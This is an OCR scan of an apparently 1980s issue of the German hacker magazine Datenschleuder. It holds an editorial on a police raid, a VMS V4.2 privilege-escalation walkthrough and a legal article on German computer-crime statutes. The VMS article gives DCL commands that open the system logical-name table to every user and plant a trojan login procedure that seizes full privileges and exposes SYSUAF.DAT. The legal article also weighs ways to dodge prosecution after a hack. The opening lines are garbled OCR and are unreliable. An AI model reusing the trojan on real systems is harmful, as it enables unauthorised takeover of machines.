■•hr Iw.tand, auf Ihr aln"«* W»t*a suiuxrAlfm,
2) b*l dar rlraa rhlllpa ln Franki^loh ln 4aa 4ortl|. TAI-Cna-
Butarivitaa alndranaan, Datan taaapkhtan ^ Tjrlndmrtan .e>-
« 1 « •AoooxratlB,*-Ak»anunttrlag4'' »u.lB.ohtan. ^nnwort»
Bodlflilart.n und Prafran«. auf Py«t»anlTe«u hlrrufU*tan,
wob.l ln h«ldan mian hal 4 *n lOrgmnlBBtlon.n aohid.n »nt-
■tand.n, dl. B.lt. iwoh nloht dbaahbar «Ind.
lT«r«.h.n, itrafbar «aalR {« 802a,j303a, JOJb, 25 Ab». 1 und ?,
52, 53 StGB.
I
SatciiSrfjkiiikcr
Editorial
Lieber Leser!
Die beste Ausrede für unser diesmaliges Späler-
scheinen werden Sie sicherlich schon der Tages¬
presse entnommen haben. Es bereitet uns einige
Schwierigkeiten, diese Datenschleuder mit einem
erheblichen Defizit an Redaktionsmaterial und
-Technik so aufzubereiten, wie sie jetzt hinter uns
und vor Ihnen liegt. Leider hat uns das Bundes¬
kriminalamt einiger Wissensmaschinen von zen¬
traler Bedeutung für die Blldschirmtcxt- und
Datenschleuder-Redaktion entledigt.
Das BKA hat sich bei uns nun also nicht nur eine
kostenlose Schulung im Hacken sowie eine Grund-
ausstatlung vorsortierter Literatur, sondern auch die
persönlichen Daten aller unserer Mitglieder und
Abonnenten abgeholt.
Jeder Abonnent der Daleschleuder und Jedes
Mitglied des CCC e.V. ist daher spätestens jetzt
beim BKA aktenkundig. Es kann nicht davon
ausgegangen werden, daß der Datenschutz ge¬
wahrt wird.
In diesem Zusammenhang sei darauf hingewiesen,
daß ein eventueller Prozeß zur Schaffung von Prä¬
zedenzfällen für das zweite WiKG wahrscheinlich
zu keinem juristisch brauchbaren Ergebnis, mit Si¬
cherheit aber zu unserem ökonomischen Exitus füh¬
ren würde, denn trotz öffentlicher Äußerungen dies¬
bezüglich sind bisher leider keine Eingänge von
Gorbie oder seinesgleichen auf unseren Konten gut¬
geschrieben worden.
Daher bitten wir die Leser und das Umfeld um
finanzielle Unterstützung zur Gründung eines Pro-
zeßkosienfonds für mittellose Hacker. Schließlich
pflegen wir für eben dieses Umfeld gelegentlich
unsere Köpfe hinzu halten, wenn irgendwelche wild¬
gewordenen Ordnungsbehörden blindwütig um sich
schlagen.
y\.uß e.n pdiscKe
Wel+i^aumsckiffe
besuchen unsere Erde
Wir empfehlen, Spenden, die ausschließlich diesem
Zweck dienen sollen, durch das Stichwort ,J1AC-
KERHILFE“ eindeutig zu kennzeichnen.
Doch nun zu einer weiteren Folge aus der Serie
.J’ech und Pannen“: Die Telefonnummer des Ap¬
parates in den Clubräumen („Achtung Abhörge¬
fahr“) ist in der letzten Ausgabe zum Leidwesen
eines nichtsahnenden Postgeschädigten fehlerhaft
abgedmekt worden.
Die richtige Nummer lautet:
490 37 57
„ EinSpecht hackt jetzt an unseren Rechnern undwir
hacken auf der Schreibmaschine.“
Snlcnädilciilicr
Vic.
3
Erwartungsgemäß soll jede Art von Software,
insbesondere das Betriebssystem einer Reche¬
nanlage, dem Anwender einen fehlerfreien und
sicheren Betrieb des Computersystems garan¬
tieren. Die Systementwickler entwerfen Pro¬
gramme, ohne auch nur im geringsten zu er¬
warten, daß sie auf Anhieb korrekt sein werden.
Programmierer verbringen mindestens genau so¬
viel Zeit damit, ihre Software zu testen und even¬
tuellen Fehlern entgegenzuwirken.
Was das im einzelnen für Bugs, also Fehler sind, ist
schwer zu sagen. Manche sind sicher harmlos, an¬
dere möglicherweise kritisch und führen zum ge¬
fürchteten Systemcrash. Programmierfehler sind
nun einmal unvermeidbar, und manchmal auch ein¬
fach unauffindbar.
Wer dennoch glaubt, daß Software Engineering pri¬
mitiv ist und Fehler gmndsätzlich vermieden werden
können, der hat noch keine größeren Probleme in
algorithmischer Form in Angriff genommen. Die
großen Systemhersteller beschäftigen Spezialisten
ausschließlich für die Qualitätssicherung ihrer Soft¬
wareprodukte. Denn sie wissen, daß Programmierer
eigene Fehler am schwersten finden oder diese gar
mit Absicht einbauen können.
Software wird nicht erst dann zur Benutzung frei¬
gegeben, wenn sie nachweisbar korrekt funktioniert,
sondern bereits dann, wenn die Häufigkeit, mit der
neue Fehler entdeckt werden, auf ein für die Ge¬
schäftsleitung akzeptables Niveau gesunken ist. An-
4
Wender müssen lernen, Fehler und deren Konse¬
quenzen zu erwarten. Ihnen wird gerade von den
Hackern häufig erklärt, wie sie bis zur Verbesserung
der Software die Fehler umgehen können.
Gerade die VAX-Systeme und ihr Bebiebssystem
VMS von DEC setzen sich aus einfach zu verste¬
henden und strukiuriert aufgebauten Software-
Modulen zusammen, VMS gilt bei den Hackern
nicht zu Unrecht als eines von der Qualität und
Systemsicherheit meistgeschätrtesien Betriebssy-
stemeder Welt. Dochauch indemsoau.sgeklügelien
VMS werden immer wieder Bugs entdeckt, die sich
als echte Sicherheitslöcher des Betriebssystems er¬
weisen.
Ziel eines auf Datenreise befindlichen VAX-
Tüftlers ist bekannterweise nicht nur das Eindringen
in VAXen, sondern diese auch unter Kontrolle zu
bekommen. Um sich nun nach einem Eindringen in
ein VAX-System die nötigen SYSTEM-Privilegien
zu verschaffen, sucht der geschickte und erfahrene
Hacker erst einmal nach dem SESAM ÖFFNE DICH
des Betriebssystems. Erst wenn dieser gefunden ist
und das Reich der Privilegien erschlossen wurde, gilt
eine VAX unter Hackern als geknackt bzw. offen.
Einige dieser SESAM ÖFFNE DICH-VAX-
Verfahren gingen in die Geschichte ein. Des Hackers
wahre Freude ist die Vielzahl und Reichhaltigkeit
dieser Verfahren, um rasch als unpriviligierter User
den Status des SYSTEM-Managers einzunehmen.
SnfciiMjIrukcr
Die Geschichte vom Trojanischen DCL Pferd (Di¬
gital Command Language) in VMS V4.2 bietet be¬
sonderen Anlaß zur Aufmerksamkeit. DEC bietet
seit der VMS Generation 4.X ein neues SECURITY-
Utility an - die ACE's und ACL’s (Access Control
Eniri es/Lists).
Ein ACL bietet dem SYSTEM Manager die Mög¬
lichkeit, auf bestimmte Objekte, wie etwa Dateien
und Peripherie, nichtprivilegierten Usern Rechte zu
gewähren oder eben auch zu verwehren. Seit VMS
V4.2 ist nun neu, daß ACLs auch auf I.OGICALs
selzbar sind. Da im Prinzip jeder User ACLs ver¬
wenden darf, stellte sich die Frage, ob eben diese
auch auf Objekte setzbar wären, deren Berührung
normalerweise SYSTEM-Privilegien erforderte.
Die Softwareanalytiker bei DEC unterließen in
VMS V4.2 die Prüfung auf das für eine Modifizie-
mng der SYSTEM-Tabelle erforderliche
SYSNAM-Privileg. Dieses ermöglicht nun einem
nichtpriviligienen User, die SYSTEM Tabelle mit
einem ACL zu versehen, der äquivalent mit dem
SYSNAM-Privileg sämtliche Rechte auf die SY¬
STEM Tabelle gewähn.
$ SET ACL/OBJECT=LOGICAL/ACL=(ID=*-
,ACCESS=R-rW+E+D+C)
- LNMSSYSTEM-TABLE
$ SET ACL/OBJE(rr=LOGICA17ACL=(ID=*-
,ACCESS=R+W+E-hD-KC)
- LNMSSYSTEM-DIRECTORY
Diese beiden DCL-Zeiien bieten mit der ID=* jedem
User einer 4.2er VAX die Rechte R=read, W=write,
E=execute, D=delete und C=control auf die
SYSTEM-Tabelle. Dieser Bug birgt weiterhin das
Risiko eines Systemcrashs, falls ein Unerfahrener
alle in der SYSTEM-Tabelle befindlichen LOGI-
CALs löscht. Das SYSNAM-Privileg und somit
auch dieser ACL zählen zur Gruppe der SYSTEM-
Privilegien, doch dies bedeutet noch lange nicht, alle
Privilegien einer VAX zu besitzen.
Der Hacker bedient sich des Trojanischen Pferdes,
indem er die Möglichkeit nutzt, fremde LOGICALs
in die SYSTEM-Tabelle einzutragen. Jeder einlog¬
gende User durchläuft eine ihm zugewiesene login-
Prozedur. Weist man dieser Prozedur einen
LOGICAL-Namen zu, so wird VMS erst dem LO¬
GICAL folgen und nicht erst die Prozedur namens
LOGIN.COM starten. Im User Authorization File
(UAF) wird für jeden User diese login-Prozedur als
^ICMD definiert. Im Grundzustand verwendet
©plcnSifjfciilicr
DEC besagtes LOGIN, falls im UAF bei LGICMD
keine andere Prozedur definiert wurde.
$ DEFINE/SYSTEM LOGIN DISKtÄDlRECTO-
RYÜTROJANHORSE.COM
Das vom LOGICAL LOGIN aufgerufene Trojani¬
sche DCL Pferd prüft die Privilegien jedes einlog¬
genden Users und läßt die VAX vom eigenen SY¬
STEM Manager persönlich sprengen. Als DCL Pro¬
zedur bietet sich förmlich an:
$ IF FSPRIVILEGEC'SETPRV) .EQS. “FALSE“
THEN GOTO NIX
$ SET PROCESS/PRIV[LEGE=ALL
$ SET PROTEC'nON=(W:RWED) SYSSSY-
STEMtSYSUAF.DAT
$ DELETE ’ F$L0G1CAL(“L0GIN“)
$ DEASSIGN/SYSTEM LOGIN
$NIX:
$ §SYS$LOGIN:LOGIN.COM
Es darf nicht vergessen werden, dieses File auch für
die Benutzung durch World User freizugeben. Der
erste einloggende privilegierte User wird unbemerkt
dem Hacker die Kontrolle über das SYSTEM an¬
vertrauen. Der Hacker braucht nur noch mittels des
UAF-Programms und eventueller Umgehung von
möglichen Security-Maßnahmen seitens des
SYSTEM-Managers seinem eigenen Account alle
Privilegien zu geben. SYSTEM-Manageroder Hac¬
ker können natürlich ebenso durch einen ACL die
Modifizierbarkeit der SYSTEM-Tabelle verhin¬
dern.
$ SET ACL/OBJECT=LOGICAL/ACL=(ID=*-
.ACCESS=R+E)
- LNMSSYSTEM-TABLE
$ SET ACL/OBJECT=LOGICAL/ACL=(ID=*-
,ACCESS=R+E)
- LNMSSYSTEM-DIRECTORY
Diese Methode wurde bereits in der amerikanischen
DECUS Pagewapper Anfang letzen Jahres disku-
tien. DEC reagierte damals mit einem VMS-Update
auf V4.3, womit dieser DCL-Bug verschwand. Er¬
staunlicherweise existieren am internationalen Da¬
tennetz immer noch Maschinen mit der 4.2er
Betriebssystem-Version. Kaum zu glauben, daß dort
noch nicht einmal der Bug bekannt zu sein scheint.
S.Stahl
5
Die aktuellen Tarife für’s Hacken
I.Teil mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm^m
Es müssen also Daten sein, die nicht für einen be¬
stimmt sind und für die man keine Zugangsberech¬
tigung hat. Soweit, so gut. Es muß sich also um Daten
handeln, die “besonders gesichert“ sind, welche man
sich oder einen anderen “verschafft“. Was aber ist
unter “besonders gesichen“ und “verschaffen“ i.S.d.
Ü 202a StGB zu verstehen?
Fraglich ist vor allem, ob schon ein einfacher und
normaler Paßwortschutz die Daten besonders si¬
chert. Da es kaum einen simpleren und primitiveren
Schutz von Daten gibt als eine Paßwortabfrage, kann
man also wohl kaum von einer besonderen Siche¬
rung sprechen.
Andererseits ist ein Paßwort die derzeit technisch
unkomplizierteste, wirtschaftlich vertretbarste und
zugleich auch praktisch sinnvollste Schutzma߬
nahme. Außerdem hat der Besitzer der Daten durch
Jede Freizeitbeschäftigung hat ihren Preis. Zu einen Paßwortschutz hinreichend deutlich gemacht,
den exclusiven, superteuren Hobbies würde ich (jjese Daten nur befugten Personen zur Verfü-
das Hacken zählen. Nicht wegen der wuche- gung stehen sollen, und daß er sich um die Abwehr
rähnlichen Gebühren der Post. So ärgerlich die Unbefugten ernsthaft bemüht. Damit sind die
auch sein mögen, das allein wäre noch erträglich. Voraussetzungen erfüllt, die der Gesetzgeber erfüllt
Gemeint sind die aktuellen Tarife“, die ein Hac- wissen wollte, um einen strafrechtlichen Schutz von
ker zu “bezahlen“ hat, wenn er sich erwischen naten 7 « uewshren
läßt. Der NASA-Hack, der wieder viele unbe¬
darfte Nachahmer motivieren dürfte, sowie die Gerichtsentscheidungen sind, soweit mir bekannt,
die jüngsten Hausdurchsuchungen beim CCC - hierzu noch nicht ergangen. Die soeben ausgeführte
Steffen und Wau - wegen angeblicher Hacks bei Argumentation halte ich für richtig, und sie ist im
CERN (Schweiz) und Philips (Frankreich) sind juristischen Schriftum inzwischen vorherrschend,
ein guter Anlaß, die Tarifstruktur durchschau- Yqp daher ist davon auszugehen, daß eine Straf¬
bar zu machen. barkcit wegen Ausspähens von Daten schon dann in
Betracht kommt, wenn die Daten nur durch eine
Mit Wirkung vom 1.8.1986 sind die in der Presse Paßwortabfrage gesichert sind,
sogenannten Anti-Hacker-Gesetze in Kraft getreten.
Korrekt geht es um das zweite Gesetz zur Be- DamitsindwirbeidemProblem:Wannhatmansich
kämpfung von Wirtschaftskriminalität (2. WiKG). (oder einem anderen) Daten “verschafft“? Zum
Nachfolgend wollen wir einmal betrachten, was die- einen, wenn man selbst von den Daten Kenntnis
se Gesetze dem Hacker so zu bieten haben. erlangt (also wenn man sie liest) bzw. einem anderen
die Kenntnisnahme ermöglicht. Auch ohne Kennt-
Für den preiswenen Einstieg (bis zu 2 Jahren Frei- nisnahme sind die Daten “verschafft“, wenn man sie
heitsstrafc oder Geldstrafe) wäre zunächst der neue Besitz nimmt. Das wäre der Fall, wenn die frem-
Ü 202a StGB zu nennen. Besonderer Voneil: Je- Daten auf einem Datenträger mitgespeichert
derzeit problemlos zu buchen! In Ü 202a StGB wird oder auf Papier ausgedruckt werden,
das “Ausspähen von Daten“ unter Strafe gestellt.
Sffafbar macht sich, “wer unbefugt Daten, die nicht ^gj. jg^ Paßwortschulz eines Systems knackt
für ihn bestimmt und gegen unberechtigten Zugang sich dann in dem System umsieht, das heißt
besonders gesichert sind, sich oder einem anderen Daten liest oder downloaded, hat den Ü 202a StGB
verschafft“. fest gebucht. Wer erwischt wird, könnte sich aller-
Sxtlcnädjlcukcr
dings darauf berufen, er habe nur das Paßwon ge¬
knackt, sich dann aber sofort wieder ausgeloggi,
ohne sich im System weiter umgesehen zu haben.
Das ist zwar kaum wahrscheinlich, das Gegenteil
dürfte aber nur schwer zu beweisen sein.
Fraglich ist, ob diese Argumentation geeignet ist,
einer Strafe wegen Ausspähens von Daten zu ent¬
gehen. Immerhin ist das erhackte Paßwort auch ein
Dalum, was man sich verschafft hat. Und zwar eins,
das besonders geschützt ist: Quasi durch das Pa߬
wort selbst! Warten wir ab, wie die Gerichte ent¬
scheiden werden.
Festzuhalten bleibt, daß wer in eine durch Paßwor¬
tabfrage gesicherte Mailbox, Datenbank oder ein
sonstiges Rechnersystem (vorsätzlich) unbefugtein¬
dringt, mit einer Strafe wegen Ausspähens von Da¬
ten zu rechnen hat. Als kleines Bonbon für gefrustete
Hacker: Der Versuch ist nicht unter Strafe gestellt.
Außerdem wird die Straftat nur auf Antrag des Ver¬
letzten verfolgt. D.h., daßdie S taatsan waltschaft von
sich aus die Tat nicht verfolgen kann.
SoweitderBilligtariffür Einsteiger. Aber das Gesetz
hat für extravagante Kunden auch noch teurere An¬
gebote auf Lager. Z.B. für solche, die Daten zer¬
stören oder verändern. Dazu zählen auch der Einsatz
von Viren oder (die wohl auch beim NASA-Hack
eingestzten) Trojanischen Pferde. Damit sind wir
beim Thema Datenveränderung (Ü 303a StGB) und
Computersabotage Ü 303b StGB).
Der Tarif für die schlichte Datenveränderung ist
noch relativ moderat: Es wird Freiheitsstrafe bis zu
zwei Jahren oder Geldstrafe geboten. Computersa¬
botage kommt schon teurer: Freiheitsstrafe bis zu 5
Jahren oder Geldstrafe. Manche Hacker werden sich
jetzt vielleicht in die Brust werfen, bekannte Phrasen
über “Hacker-Ethos“ ablassen und kategorisch fest¬
stellen: “Hacker sabotieren nicht.“ - Doch! So zum
Beispiel die NASA-Hackerl (Oder waren das gar
keine “Hacker“ ???)
Zunächst zur Datenveränderung. Bestraft wird, wer
Daten “löscht, unterdrückt, unbrauchbar macht oder
verändert“. Da ist das Gesetz einmal so erfreulich
deutlich, daß es auch dem Laien kaum noch kom¬
mentiert zu werden braucht. Praktisch jede Mani¬
pulation von gespeichenen Daten wird von der
Norm erfaßt. Dazu gehört natürlich auch das Er¬
gänzen von Daten, zum Beispiel das Einfügen eines
neuen Paßworts in die Passwort-Datei. Fast über¬
flüssig zu erwähnen, daß Programme selbstver-
EntcnBililcahcr
.stündlich auch Daten sind. Werden Programme
durch Viren oder Trojanische Pferde verändert, so
liegt eine strafbare Datenveränderung vor. Dies
kommt ebenso in Betracht, wenn Daten an einen
anderen Empfänger umgeleitet oder sonst abgefan¬
gen werden.
Im Gegensatz zum Ausspähen von Daten ist hier
auch schon der Versuch strafbar. Stümperei schützt
also vor Strafe nicht! Verfolgt wird die Datenve¬
ränderung - wie auch die im Anschluß vorgestellte
Computersabotage- nurauf Antrag. Bei besonderem
öffentlichen Interesse kann die Staatsanwaltschaft
aber auch von Amtswegen, also ohne Strafantrag des
Verletzten, einschreiien.
Die Computersabotage (Ü 303B StGB) soll uns hier
nur in ihrer ersten Fallgestalt (Ü 303b I Nr.l StGB;
Nr.2 bezieht sich nur auf Be.schädigung von Hard¬
ware) interessieren. Dort baut sie auf der Datenve¬
ränderung auf. Compulersabotage ist demnach eine
Daten Veränderung (wie oben dargestellt), wenn da¬
durch “eine Datenverarbeitung, die für einen frem¬
den Betrieb, ein fremdes Unternehmen oder eine
Behörde von wesentlicher Bedeutung ist“, gestön
wird.
“Von wesentlicher Bedeutung“ ist eine DVA, wenn
von ihrem störungsfreien Ablauf die Funktions-
tiiehtigkeit des Betriebes im Ganzen abhängt. Dies
betrifft heute, rasch zunehmend, die meisten Be¬
triebe, Unternehmen oder Behörden, die eine elek¬
tronische Datenverarbeitung einsetzen.
Keineswegs falsch dürfe die Annahme sein, daß die
EDV-Anlagen der NASA und der ihr angeschlos¬
senen Forschungsinstitute für ihre Betreiber eine
wesentliche Bedeutung haben. In diesen Anlagen
der NASA (und anderer Institute) sind bei dem
NASA-Hack Daten durch Einsatz von Trojanischen
Pferden verändert worden. Damit haben die NASA-
Hacker ein schönes Beispiel für eine Computersa¬
botage geliefert. Auch bei der Computersabotage ist
schon der Versuch strafbar. Zur Erforderlichkeit
eines Strafantrags siehe oben.
Im folgenden zweiten Teil dieses Artikels werden
die etwas teureren Normen vorgestellt und Überle¬
gungen angestellt, ob und wie unter bestimmten
Umständen sttafireies Hacken möglich sein könnte.
CLINCH/DS-RED/SrOEPSEU30.09.87/23:20/8494 2 .
7
Die aktuellen Tarife für’s Hacken
2.Teil -----------------
I
I ackern, denen selbst bei Androhung von bis zu fünf
Jahren Freiheitsstrafe noch der rechte Nervenkitzel
fehlt, kann geholfen werden. So sind im Rahmender
“Anii-Hacker-Gesetze“ Normen eingefühn worden,
nach denen in besonderen Fällen bis zu 10 und sogar
bis zu 15 Jahren Freiheitsstrafe verhängt werden
kann. Mehr hat unser Strafrecht selbst einem Tot¬
schläger nicht zu bieten.
8
Btx 655322
Die Normen, bei denen die angesprochenen hohen
Strafen (in besonders schweren Fällen) verhängt
werden können, sind der Computerbeirug (Ü 263a
StGB) und die Fälschung bewciserhcblichcr Daten
(Ü 269 StGB).
Hier sind wir wieder an einem Punkt, wo “ehrliche“
und “ehrenhafte“ Hacker aufbegehren werden: “Be¬
trügen tun wir wirklich nicht!“ - Nein, wirklich
nicht? Da wäre ich mir gar nicht so sicher.
Der Computerbetrug nach Ü 263a StGB baut auf
dem “normalen“ Betrug auf. Er soll Strafbarkeits¬
lücken schließen, wenn statt eines Menschen ein
Computer “betrogen“ wird. Daher sei hierzunächst
der schlichte Betnig nach Ü 263 StGB erklärt.
Der Betrug nach Ü 263 StGB setzt in Kurzfonn
folgendes voraus: Der Täter nimmt einem anderen
gegenüber eine Täuschungshandlung vor. Diese be¬
wirkt bei dem Getäuschten einen Irrtum. Aufgrund
dieses Irrtums nimmt der Getäuschte eine vermö-
gensschädigende Verfügung über eigenes oder
fremdes Vermögen vor.
Beim Computerbetrug nach Ü 263a StGB ist die
Vermögensschädigung eines Dritten nun auch straf¬
bar, wenn nicht eine Person, sondern ein Computer
durch Eingriffe ins Programm oder durch Manipu¬
lation von Daten etc. “getäuscht“ wird. Ein einfaches
Beispiel für einen Computerbetrug: Bankange¬
stellter A manipuliert die im Computer seiner Bank
gespeicherten Daten so, daß sein Minuskonto wieder
einen schönen Guthabenbetrag ausweist. Fälle die¬
ser Art mögen dem Gesetzgeber in erster Linie vor¬
geschwebt sein, als erden Ü 263aeinführte, Aber die
Anwendbarkeit des Computerbetrugs geht erheblich
weiter. So ist der Gebrauch von “Leih-NLU’s“ un¬
problematisch als Computerbetrug zu bewerten.
Denn das Vermögen des NUI-lnhabers wird dadurch
geschädigt, daß durch unbefugte Benutzung von
Daten (NUI Teil A und B) der Ablauf eines Daten-
verabeitungsvorgangangs (beim PAD durch Lei¬
stungsgewährung an den Unberechtigten) beeinflußt
wird. Dieser Vermögensschaden ist "sioffgleich“
SatcnBii)lciiber
mit dem Veimögensvorteil, den der Täter anstrebt
und auch erwirbt. Damit liegen die Voraussetzungen
des Computerbetrugs vor.
Entsprechend dürften, abhängig vom Einzelfall, die
Voraussetzungen eines Computerbetruges auch
dann vorliegen, wenn mit einem fremden oder fal¬
schen Paßwort ein anderes Netzwerk für eine preis¬
werte Datenreise geöffnet wird. Von daher könnte
auch unterdiesem Gesichtspunkt beim N AS A-Hack
ein Computerbetrug begangen worden sein.
Allgernein ist zu den Voraussetzungen des Com¬
puterbetrugs noch anzuraerken, daß strafb.ir nur die
vorsätzliche Handlung ist. Wie schon angedeutet,
muß zusätzlich, wie bei Ü 263 auch, der Täler die
Absicht haben, sich durch seine Handlung einen
rechtswidrigen Vermögensvorteil zu verschaffen.
Auch beim Compuicrbeirug ist schon der Versuch
strafbar.
Abschließend kommen wir zur Fälschung bewei-
scrheblichcrDaten (Ü 269 StGB). Bestraft wird nach
dieser Norm, wer zur Täuschung im Rechtsverkehr
beweiserhebliche Daten so speichert oder verändert,
daß bei ihrer Wahrnehmung eine unechte oder ver¬
fälschte Urkunde entstehen würde. Ebenso bestraft
wird, wer derart gespeicherte oder verändene Daten
gebraucht. Aufgrund des doch recht beiiächiUchen
Strafrahmens - es können bis zu fünf, und wie bereits
dargelegi, in besonders schweren Fällen bis zu 15
Jahren Freiheitsstrafe verhängt werden - soll hier
etwas näher erläutert werden, wann eine Strafbarkeit
nach LI 269 StGB vorliegen könnte.
Ü 269 StGB knüpft an den Ü 267 StGB (Urkun¬
denfälschung) an. Im Unterschied zu Urkunden sind
Daten nicht unmittelbar wahrnehmbar. Die Daten
sind im Hauptspeicher des Computers oder auf Da¬
tenträger gespeichert. Dort sind sie für den Men¬
schen nicht ohne Hilfsmittel sichtbar. Erst wenn die
Daten auf einem Bildschirm angezeigt oder von
einem Drucker ausgedruckt werden, sind sie wahr¬
nehmbar. Frühestens dann könnten die Daten eine
Urkunde sein. Der Gesetzgeber wollte die Straf¬
barkeit aber vorverlegen auf den Zeitpunkt der Ma¬
nipulation der Daten. Das hat den Vorteil, daß die
Strafbarkeit nicht zufällig davon abhängt, ob bzw.
wann die Daten sichtbar gemacht werden. Deswegen
ist in Ü 269 StGB unter Strafe gestellt worden,
beweiserhebliche Daten so zu manipulieren, daß
diese Daten - wären sie unmittelbar wahrnehmbar -
eine unechte oder verfälschte Urkunde darstellen
würden.
9
Emscheidend ist, was unter einer unechten oder
verfälschten Urkunde zu verstehen ist. Eine unechte
Urkunde würden die Daten bei ihrer Wahrnehm¬
barkeit sein, wenn über den Aussteller der Urkunde
getäuscht wird. Also wenn die Daten nicht von
demjenigen stammen, von dem sie zu stammen
scheinen. Verfälscht wird eine Urkunde, wenn eine
zunächst echte Urkunde so verändert wird, daß ihr
Inhalt dem Erklärenden (Aussteller) nicht mehr zu¬
zurechnen ist.
Ebenfalls bestraft wird das Gebrauchen der in oben
beschriebener Weise manipulierten Daten. Ein Ge¬
brauchen liegt z.B. vor. wenn dem zu Täuschenden
die Daten auf einem Datenträger überlassen oder am
Bildschirm sichtbar gemacht werden.
Dazu ein Beispiel; Banklehrling L “spielt“ an dem
Rechner seines Kreditinstituts herum. Dabei mani-
pulien erdie im Rechner gespeicherten Daten so, daß
sein Girokonto endlich mal wieder schwarze Zahlen
zeigt. Außerdem richtet er sich ein neues Sparbuch
mit einem Guthaben von 100.000,- DM ein. - Im
ersten Fall würde bei Wahrnehmbarkeit der Daten
eine verfälschte, im zweiten eine unechte Urkunde
vorliegen.
Gut, so etwas tut ein Hacker nicht. Aber eine NUI
“leiht“ er sich doch schon einmal aus. Dabei ist die
Rechtslage nicht so zweifelsfrei wie bei dem obigen
Beispiel, abereine Fälschung beweiserheblicher Da¬
ten kommt auch dort in Betracht. Denn durch Ein¬
gabe der NUI Teil A und B scheint doch der NUI-
Inhaberzu erklären,daß erdie Verbindung zum PAD
hergestellt hat und für die anfallenden Gebühren
(notgedrungen) aufkommen will. Wären diese be¬
weiserheblichen Daten unmittelbar wahrnehmbar,
würden sie wohl als Urkunde einzustufen sein. In der
Literatur ist dieses Beispiel noch nicht erörtern wor¬
den, aber mir scheint, daß man hier das Vorliegen
eines Delikts der Fälschung beweiserheblicher Da¬
ten bejahen müßte.
Damit sind die wichtigsten Tariffragen für Hacker
geklärt. Klar dürfte jetzt sein, daß es kaum möglich
ist, zu hacken, ohne sich strafbar zu machen. Damit
stellt sich für Einzelpersonen und Vereine, die die
Unsicherheit der Netze erforschen und aufdecken
wollen (und nur um die soll es hier gehen - Hackern
die aus purer Neugier, Geltungssucht oder sogar
Gewinnsucht handeln, kann und will ich nicht hel¬
fen) die Frage, ob und wie sie noch hacken können,
ohne ein großes Strafrisiko auf sich zu nehmen.
Denn eins sieht fest; Der legendäre HASPA-Coup
JE SCHARFER,
des CCC ließe sich bei der heutigen Gesetzeslage
nicht wiederholen, ohne daß die Akteure mit
Freiheits- und/oder Geldstrafen rechnen müßten!
Theoretisch bieten sich zwei Möglichkeiten an. Die
erste Möglichkeit wäre, sich um die Gesetze nicht
viel zu scheren, aber dafür zu sorgen, daß einem
nichts nachgewiesen werden kann. Die zweite Mög¬
lichkeit wäre so vorzugehen, daß man sich trotz
raffinierter Hacks nicht strafbar macht.
Wenden wir uns zunächst der ersten Möglichkeit zu.
Sie hat den Vorteil, daß man sich kaum Einschrän¬
kungen beim Hacken auferlegen müßte. Der große
Nachteil ist der gewaltige Risikofaktor dabei.
Da ja Zweck der ganzen (jung sein soll, sich nach
einem erfolgreichen Hack an die Öffentlichkeit zu
wenden, um die Sicherheilslücken publik zu ma¬
chen, muß man zwangsläufig den Kopf aus der
Deckung nehmen und damit auch den Strafverfol¬
gungsbehörden eine Angriffsfläche bieten.
Es scheint sich nur eine halbwegs erfolgsverspre¬
chende Lösung anzubieten, wie man dennoch einer
Bestrafung entgehen könnte. Dies wäre ein Vorge¬
hen, ähnlich wie der CCC beim NASA-Hack prak¬
tiziert hat. Man bekennt nicht, die Tat selbst verübt
zu haben. Stattdessen schiebt man den großen Un¬
bekannten vor, der die Tat begangen habe, die man
selbst nun für ihn publik mache. Solange sich nicht
beweisen läßt, daß der Unbekannte eine Erfindung
ist und der wahre Täter der den Hack Publizierende
ist, kann letzterer auch nicht bestraft werden.
Da derjenige, der den Hack publiziert, angeblich
nicht Täter ist, ist er grundsätzlich als Zeuge zur
Aussage verpflichtet. Wird die Aussage verweigert,
kann ein Ordnungsgeld verhängt und Erzwin¬
gungshaft bis zu 180 Tagen angeordnet werden. Also
auch keine rechte Perspektive.
SntciiSdjIciibcr
DESTO ANREGENDER
Hiergegen hilft nur, sich darauf zu berufen, daß man
keine sachdienlichen Angaben machen könne. Dies
ist beieinemdetalierten Bericht überden Hack kaum
glaubwürdig. Daher wäre die Gefahr einer Erzwin¬
gungshaft auf diese Weise nur schwerlich abzu¬
wenden. Ein anderer Ausweg wäre noch, sich auf das
Zeugnisverweigerungsrecht zu berufen. Ein solches
steht einem zu, wenn man sich andernfalls selbst
oder einen nahen Verwandten belasten müßte. Da¬
mit ist dann der große Unbekannte aber im Prinzip
wieder gestorben. Die Staatsanwaltschaft wird
schnell nachweisen können, daß das Zeugnisver¬
weigerungsrecht nicht besteht, oder aber oen la-
terkreis sehr eng eingrenzen können. Damit stellt
sich die Frage; Gibt es Beweise die sich finden
ließen, Zeugen die bei bohrender Befragung “sin¬
gen“ könnten? Wenn ja, dann ist das Spiel verloren!
Erheblich sicherer ist e.s da. jemand einzuschallen,
der aus beruflichen Gründen ein Zeugnisverweige¬
rungsrecht hat; Einen Rechtsanwalt. Dieser wird
damit betraut, im Namen seiner nicht zu benen¬
nende.: Mandanten der Öffentlichkeit die entspre¬
chenden Erklärungen und Belege für den Hack ab¬
zugeben. Aber auch diese Methode ist nicht ohne
Nachteile. Auch wenn der Anwalt weder Aussagen
braucht noch machen darf, so läßt sich doch mög¬
licherweise über den Anwalt auf die in Betracht
kommenden Täter schließen. Wenn das gelingt,
stellt sich wieder die Frage; Läßt sich bei denen
etwas finden, gibt es undichte Zeugen?
Überzeugen können alle diese Varianten nicht. Da¬
her sollte untersucht werden, wie man Aktionen
starten kann, bei denen man sich erst gar nicht
strafbar macht.
Da, wie in den ersten Teilen dargestellt, praktisch
keine Möglichkeit besteht, einen erfolgreichen Hack
durchzuführen, ohne mit Strafgesetzen in Konflikt
zu geraten, gibt es nur noch eine Möglichkeit; Bloß
Sntciiürf/Iciibcr
solche Hacks zu machen, bei denen man zuvor eine
Einwilligung des Opfers einholt. Bei einer Wie¬
derholung des HASPA-Coups etwa müßte man
vorher zu HASPA gehen und sagen, was man vor hat,
warum man es vorhat, und dafür um Erlaubnis bitten.
Wenn man diese erhält und sich ausschließlich im
Rahmen dieser Einwilligung bewegt, ist jedes Slra-
frisiko ausgeschlossen.
Wenn man sein Vorhaben vorher genau ankündigen
muß, mindert das natürlich die Erfolgsaussichten
rapide, da der Betroffene sich auf den bevorstehen¬
den Angriff einstellen und vorbeiten kann. Ander¬
seits ist die Wirkung im Erfolgsfalle umso größer.
Schließlich ist der Hack dann unter erschwerten
